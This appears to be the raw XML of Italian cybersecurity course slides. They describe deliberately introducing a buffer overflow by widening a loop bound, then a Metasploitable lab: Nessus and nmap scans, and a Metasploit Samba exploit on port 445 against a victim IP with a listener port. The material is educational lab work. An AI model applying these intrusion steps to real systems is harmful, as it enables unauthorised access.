                    <a:pt x="812800" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812800" y="129804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129804"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 6" id="6"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="812800" cy="110754"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 7" id="7"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1292303" y="962025"/>
            <a:ext cx="7954740" cy="898144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Per creare un Buffer OverFlow, in questo caso, andiamo a simulare un errore di programmazione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Andiamo semplicemente a sostituire uno dei valori numerici del codice, precisamente nell’ultimo ciclo for, sostituendo “j&lt;10” con “j&lt;12”, creando un errore che andrà a creare il BOF.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>In questo caso, destinando un array di 10 spazi a monte, non sapremo dove il programma andrà a scrivere o leggere i dati di cui ha bisogno, avendo probabili risultati inattesi e/o distrastrosi.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>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3</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942886" y="2026278"/>
            <a:ext cx="8042644" cy="6234444"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6234444" w="8042644">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8042644" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8042644" y="6234444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6234444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="-41593"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1189260" y="2565140"/>
            <a:ext cx="7954740" cy="418084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Per creare un Buffer OverFlow, in questo caso, andiamo a simulare un errore di programmazione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>In fase di esecuzione, come da immagine, avremo un buffer overflow o segmentation fault.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9942886" y="6927849"/>
            <a:ext cx="3086100" cy="492849"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="129804"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="812800" cy="129804"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="129804" w="812800">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="812800" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812800" y="129804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129804"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="812800" cy="110754"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pP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3781592" cy="7762363"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="18375456" cy="10349817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 3" id="3"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="66675"/>
              <a:ext cx="18375456" cy="3039816"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="8880"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="8000" spc="-240">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>Giorno 4- Exploit Metasploitable con Metasploit</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="0">
              <a:off x="0" y="3790985"/>
              <a:ext cx="17384448" cy="6558832"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPts val="3899"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2999">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>SULLA MACCHINA METASPLOITABLE CI SONO DIVERSI SERVIZI IN ASCOLTO POTENZIALMENTE VULNERABILI. È RICHIESTO ALLO STUDENTE DI: </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="647700" indent="-323850" lvl="1">
                <a:lnSpc>
                  <a:spcPts val="3899"/>
                </a:lnSpc>
                <a:buFont typeface="Arial"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2999">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>EFFETTUARE UN VULNERABILITY SCANNING (BASIC SCAN) CON NESSUS SULLA MACCHINA METASPLOITABLE </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="647700" indent="-323850" lvl="1">
                <a:lnSpc>
                  <a:spcPts val="3899"/>
                </a:lnSpc>
                <a:buFont typeface="Arial"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2999">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>SFRUTTARE LA VULNERABILITÀ DEL SERVIZIO ATTIVO SULLA PORTA 445 TCP UTILIZZANDO MSFCONSOLE  </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="647700" indent="-323850" lvl="1">
                <a:lnSpc>
                  <a:spcPts val="3899"/>
                </a:lnSpc>
                <a:buFont typeface="Arial"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2999">
                  <a:solidFill>
                    <a:srgbClr val="57FFDC"/>
                  </a:solidFill>
                  <a:latin typeface="HK Grotesk Bold"/>
                </a:rPr>
                <a:t>ESEGUIRE IL COMANDO «IFCONFIG» UNA VOLTA OTTENUTA LA SESSIONE PER VERIFICARE L’INDIRIZZO DI RETE DELLA MACCHINA VITTIMA</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>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5289355" y="1047750"/>
            <a:ext cx="1969945" cy="336959"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="2664"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk Bold"/>
              </a:rPr>
              <a:t>BUILD WEEK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076835" y="3218799"/>
            <a:ext cx="9937325" cy="4102486"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4102486" w="9937325">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9937325" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9937325" y="4102486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4102486"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="450785" y="2246172"/>
            <a:ext cx="7388003" cy="598106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Al fine del corretto svolgimento dell’esercizio, prima di passare alla fase di exploit, effettuiamo un Vulnerability Scan con l’ausilio di Nessus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Dopo l’analisi, Nessus ci fornirà un report dettagliato delle eventuali criticità attive sulla macchina in questione, in questo caso Metasplotable.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429336" y="1810156"/>
            <a:ext cx="9535385" cy="6666688"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6666688" w="9535385">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9535384" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9535384" y="6666688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6666688"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="450785" y="1819592"/>
            <a:ext cx="7388003" cy="658114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Effettuato lo scan e individuate le criticità, passiamo a una scansione delle porte e dei servizi attivi sulla macchina vittima con l’utilizzo di nmap.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Dall’analisi di nmap, fra i tanti risultati, troviamo anche la porta 445 su cui è attivo il netbios-SAMBA, un protocollo che permette di mettere in comunicazione due dispositivi con OS diversi.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8429336" y="5330682"/>
            <a:ext cx="9182816" cy="372632"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2418519" cy="98142"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="2418519" cy="98142"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="98142" w="2418519">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2418519" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2418519" y="98142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="98142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="2418519" cy="79092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pP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231125" y="2488384"/>
            <a:ext cx="9797533" cy="5310232"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5310232" w="9797533">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9797533" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9797533" y="5310232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5310232"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 5" id="5"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="330568" y="1819592"/>
            <a:ext cx="7388003" cy="71812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Trovata la porta da cui effettueremo il nostro attacco, possiamo passare alla fase di exploit con Metasploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Tramite il comando “search samba”, quindi, andremo a trovare un possibile exploit da utilizzare per la vulnerabilità in questione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Per il buon fine del nostro attacco, sceglieremo il numero 8, usando il comando “use 8”.</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853544" y="2486342"/>
            <a:ext cx="7886102" cy="5314315"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5314315" w="7886102">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7886102" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7886102" y="5314316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5314316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 4" id="4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10046136" y="3667529"/>
            <a:ext cx="7567899" cy="353360"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2101899" cy="98142"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 5" id="5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="2101899" cy="98142"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="98142" w="2101899">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2101899" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2101899" y="98142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="98142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 6" id="6"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="2101899" cy="79092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10012645" y="5636039"/>
            <a:ext cx="7567899" cy="353360"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2101899" cy="98142"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 8" id="8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="2101899" cy="98142"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="98142" w="2101899">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2101899" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2101899" y="98142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="98142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FF3131"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 9" id="9"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="19050"/>
              <a:ext cx="2101899" cy="79092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2664"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 10" id="10"/>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 11" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="2419667"/>
            <a:ext cx="7388003" cy="538099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Individuato l’exploit da utilizzare, andiamo a definire alcuni dettagli nel suo payload, col comando “show options”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>In questa sezione, possiamo andare a definire, per esempio, l’IP della macchina da attaccare ed eventuali porte dalle quali mettersi in ascolto.</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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 4" id="4"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="2565534"/>
            <a:ext cx="7388003" cy="538099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Individuato l’exploit da utilizzare, andiamo a definire alcuni dettagli nel suo payload, col comando “show options”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3399">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Grotesk"/>
              </a:rPr>
              <a:t>Andiamo quindi a specificare l’IP della macchina vittima 192.168.50.150 e la porta da cui ci metteremo in ascolto, la porta 5555.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
